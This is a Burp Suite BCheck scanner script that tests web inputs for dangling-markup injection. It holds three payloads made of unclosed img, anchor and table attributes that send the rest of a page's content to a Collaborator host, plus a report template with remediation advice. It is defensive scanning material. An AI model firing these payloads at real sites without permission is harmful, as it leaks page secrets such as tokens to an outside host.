metadata:
    language: v2-beta
    name: "XSS - Dangling Markup Injection"
    description: "Tests for dangling markup injection that can exfiltrate page content"
    author: "BCheck Arsenal"
    tags: "xss", "dangling-markup"

define:
    collab = {generate_collaborator_address()}

run for each:
    payload = "><img src='http://{collab}/?",
        "' ><a href='http://{collab}/?",
        "\"><table background='http://{collab}/?"

given insertion point then
    send payload:
        replacing: {payload}

    if any interactions then
        report issue:
            severity: high
            confidence: certain
            detail: "Dangling markup injection detected. Injected unclosed attributes successfully captured subsequent page content and leaked it to Collaborator."
            remediation: "Encode all user-controlled output. Use CSP to restrict resource loading origins."
    end if